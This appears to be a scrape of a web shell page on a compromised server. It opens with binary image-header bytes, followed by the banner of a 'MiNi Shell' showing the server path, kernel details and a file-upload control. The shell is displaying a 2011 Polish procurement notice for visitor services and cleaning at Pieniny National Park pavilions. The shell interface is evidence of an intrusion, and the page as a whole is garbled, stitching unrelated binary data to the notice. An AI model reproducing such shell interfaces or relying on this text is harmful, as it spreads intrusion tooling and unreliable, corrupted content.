JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110216/55013-N-2011.html

<p class="kh_header"><b>Krościenko nad Dunajcem: Prowadzenie obslugi zwiedzających w pawilonach edukacyjnych Pienińskiego Parku  Narodowego</b><br>
<b>Numer ogłoszenia: 55013 - 2011; data zamieszczenia: 16.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pieniński Park Narodowy , ul. Jagiellońska 107, 34-450 Krościenko nad Dunajcem, woj. małopolskie, tel. 018 2625601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pieninypn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie obslugi zwiedzających w pawilonach edukacyjnych Pienińskiego Parku  Narodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A) prowadzenie obsługi zwiedzających oraz utrzymanie porządku i czystości na terenie przystani flisackiej w Sromowcach Kątach w okresie od 1.04.2011 do 31.10.2011 r. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień            8.30 - 17.00 
- maj 		8.30 - 17.00 
- czerwiec 	8.30 - 17.00 
- lipiec 		8.30 - 17.00 
- sierpień 	8.30 - 17.00 
- wrzesień 	8.30 - 16.00 
- październik 	9.00 - 15.00 
- udzielania wszechstronnych informacji na temat Pienińskiego Parku Narodowego, ze szczególnym uwzględnieniem spływu Przełomem Dunajca,
- wydawania bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlania filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienia wysokiej kultury obsługi,
2. w zakresie utrzymania porządku:
stałe utrzymanie czystości poprzez sprzątanie z częstotliwością wynikającą z potrzeb, 
a zwłaszcza codzienne, generalne posprzątanie po zamknięciu kas spływu. Zakres prac obejmuje: 
- zamiatanie drogi dojścia od parkingu do nabrzeża, schodów na nabrzeżu, drogi wokół pawilonu edukacyjnego, parkingu roboczego, drogi betonowej na nabrzeżu roboczym, drogi do przystani roboczej, drogi asfaltowej przy przystankach autobusowych od skrzyżowania z drogą od parkingów, 
- zbieranie śmieci na całym terenie przystani wraz z nabrzeżem i składem łodzi, 
- mycie okien, drzwi, szyb gablot, parapetów i podłogi w pawilonie wystawowym i holu, usuwanie pajęczyn, 
- koszenie trawników, zbieranie kamieni, pielęgnacja zieleni, 
- wycinanie roślinności wyrastającej na ciągach komunikacyjnych i w rowach odpływowych, 
- opróżnianie koszy na śmieci
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.

B) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych, utrzymanie porządku i czystości w pawilonie i jego otoczeniu oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.10.2011r. 
W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków
- maj 		10.00 - 17.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 17.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień 	10.00 - 15.00 z wyjątkiem poniedziałków
- październik 	10.00 - 15.00 z wyjątkiem poniedziałków
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przy ogródku roślin pienińskich, droga przed pawilonem) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- utrzymanie w należytym stanie ogródka roślin pienińskich,
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby.

C)  prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej, utrzymanie porządku i czystości w pawilonie i jego otoczeniu oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.10.2011r. 
W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków 
- maj 		10.00 - 15.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 15.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień	10.00 - 15.00 z wyjątkiem poniedziałków
- październik 	10.00 - 15.00 z wyjątkiem poniedziałków
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadania w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przed pawilonem, droga przed pawilonem) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań
- zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.

D) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Szczawnicy, utrzymanie porządku i czystości w pawilonie, jego otoczeniu i wzdłuż drogi pienińskiej oraz prowadzenie sanitariatów w pawilonie w okresie od 1.04.2011 do 31.03.2012 r. 
W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień 	10.00 - 15.00 z wyjątkiem poniedziałków
- maj 		10.00 - 17.00 z wyjątkiem  poniedziałków
- czerwiec 	10.00 - 17.00 z wyjątkiem poniedziałków
- lipiec 		10.00 - 19.00 
- sierpień 	10.00 - 19.00
- wrzesień 	10.00 - 16.00 z wyjątkiem poniedziałków
- październik 	10.00 - 16.00 z wyjątkiem poniedziałków
- listopad		 nieczynne
- grudzień	10.00 - 15.00 z wyjątkiem poniedziałków
- styczeń	10.00 - 15.00 z wyjątkiem poniedziałków
- luty		10.00 - 15.00 z wyjątkiem poniedziałków
- marzec		10.00 - 15.00 z wyjątkiem poniedziałków
Ponadto nieczynne 1.01, 25 - 26. 12 oraz w Święta Wielkanocne
- udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
- posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw i pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
- wydawanie bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienie wysokiej kultury obsługi.
2. w zakresie utrzymania porządku:
- stałe utrzymanie czystości w pawilonie i jego otoczeniu oraz wzdłuż Drogi Pienińskiej (na odległość do 10 m na skarpie i po lustro wody na Dunajcu) poprzez sprzątanie z częstotliwością wynikającą z potrzeb, a zwłaszcza generalne posprzątanie po zamknięciu pawilonu.
- utrzymanie w należytym stanie zieleni wokół pawilonu,
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
3. w zakresie prowadzenia sanitariatów:
- codziennego otwarcia toalet w godzinach otwarcia pawilonu,
- utrzymania porządku i czystości pomieszczeń,
- zapewnienia stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
- bieżącej konserwacji, naprawy i ewentualnej wymiany urządzeń umożliwiających ich prawidłowe funkcjonowanie,
- usuwania niedrożności przewodów odpływowych od urządzeń sanitarnych,
- realizacji poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych oraz ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
- zapewnienia stale dostępnej ciepłej wody,
- codziennej dezynfekcji urządzeń sanitarnych,
- występowania w schludnym stroju,
- zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli za wyjątkiem pomieszczenia służbowego,
- za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,00 zł od osoby..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest również konieczność wskazania w ofercie co najmniej jednej osoby, która będzie prowadzić punkt informacyjny w pawilonie. Ilość zgłoszonych osób do prowadzenia punktów informacyjnych przez jednego oferenta jest dowolna z tym, że jeżeli oferent zgłasza ofertę na jeden pawilon to wskazuje minimum 1 osobę, jeżeli na dwa pawilony to minimum 2 osoby, jeżeli na trzy pawilony to minimum 3 osoby, jeżeli na cztery pawilony to minimum 4 osoby. Zgłoszone do prowadzenia punktu informacyjnego osoby w dniu otwarcia ofert poddane zostają egzaminowi testowemu mającemu na celu sprawdzenie ich wiedzy w zakresie znajomości Pienińskiego Parku Narodowego, Pienin, ich otoczenia i atrakcji turystycznych. Pytania testowe obejmować będą wiedzę dostępną w następujących publikacjach: 
- Stefan Michalik - Pieniny - park dwu narodów, przewodnik przyrodniczy, Krościenko n/D 2005,
- Józef Nyka -Pieniny - przewodnik, Latchorzew 2003 lub nowszy,
- strona internetowa www.pieninypn.pl.
Za poprawne rozwiązanie testu można otrzymać 100 punktów. Egzamin zdadzą te osoby, które uzyskają co najmniej 60 punktów.  
 -Jeżeli oferent składał ofertę na jeden pawilon to egzamin musi zdać co najmniej 1 osoba zgłoszona przez niego w ofercie. 
- Jeżeli oferent składał ofertę na 2 pawilony, a egzamin zdała tylko 1 osoba, to do oceny w przetargu dopuszczona jest 1 oferta cząstkowa najkorzystniejsza cenowo dla zamawiającego. 
- Jeżeli oferent składał ofertę na trzy pawilony, a egzamin zdały 1 lub 2 osoby, to do oceny w przetargu dopuszcza się odpowiednio 1 lub 2 oferty cząstkowe najkorzystniejsze cenowo dla zamawiającego. 
-  Jeżeli oferent składał ofertę na cztery pawilony, a egzamin zdały 1, 2 lub 3 osoby, to do oceny w przetargu dopuszcza się odpowiednio 1, 2 lub 3 oferty cząstkowe najkorzystniejsze cenowo dla zamawiającego.
- W przypadku jeżeli żadna ze zgłoszonych osób nie zdała egzaminu to cała oferta zostaje odrzucona.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pieninypn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pieniński Park Narodowy
34-450 Krościenko n/D.
ul. Jagiellońska 107b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 09:00, miejsce: Pieniński Park Narodowy
34-450 Krościenko n/D.
ul. Jagiellońska 107b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> prowadzenie obsługi zwiedzających oraz utrzymanie porządku i czystości na terenie przystani flisackiej w Sromowcach Kątach w okresie od 1.04.2011 do 31.10.2011 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
1. w zakresie informacji dla zwiedzających:
- otwarcia pawilonu edukacyjnego i punktu informacyjnego według następującego harmonogramu:
- kwiecień             8.30 - 17.00 
- maj 		 8.30 - 17.00 
- czerwiec 	 8.30 - 17.00 
- lipiec 		 8.30 - 17.00 
- sierpień 	 8.30 - 17.00 
- wrzesień 	 8.30 - 16.00 
- październik 	 9.00 - 15.00 
- udzielania wszechstronnych informacji na temat Pienińskiego Parku Narodowego, ze szczególnym uwzględnieniem spływu Przełomem Dunajca,
- wydawania bezpłatnych materiałów informacyjnych dostarczanych przez zleceniodawcę,
- wyświetlania filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
- zapewnienia wysokiej kultury obsługi,
2. w zakresie utrzymania porządku:
stałe utrzymanie czystości poprzez sprzątanie z częstotliwością wynikającą z potrzeb, 
a zwłaszcza codzienne, generalne posprzątanie po zamknięciu kas spływu. Zakres prac obejmuje: 
- zamiatanie drogi dojścia od parkingu do nabrzeża, schodów na nabrzeżu, drogi wokół pawilonu edukacyjnego, parkingu roboczego, drogi betonowej na nabrzeżu roboczym, drogi do przystani roboczej, drogi asfaltowej przy przystankach autobusowych od skrzyżowania z drogą od parkingów, 
- zbieranie śmieci na całym terenie przystani wraz z nabrzeżem i składem łodzi, 
- mycie okien, drzwi, szyb gablot, parapetów i podłogi w pawilonie wystawowym i holu, usuwanie pajęczyn, 
- koszenie trawników, zbieranie kamieni, pielęgnacja zieleni, 
- wycinanie roślinności wyrastającej na ciągach komunikacyjnych i w rowach odpływowych, 
- opróżnianie koszy na śmieci
- niezwłocznego powiadamiania PPN o konieczności wywozu kontenera,
- wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów i rowów dla spływu wody, wymiana żarówek,
- prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
